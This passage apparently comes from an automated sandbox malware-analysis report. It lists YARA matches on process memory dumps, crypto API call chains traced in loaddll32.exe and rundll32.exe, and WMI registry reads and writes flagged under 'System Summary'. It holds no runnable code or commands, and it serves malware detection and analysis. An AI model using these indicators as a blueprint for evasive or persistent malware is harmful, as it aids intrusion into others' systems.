                      Source: Yara matchFile source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00F33FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00F33FAB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_032E3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_032E3FAB

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey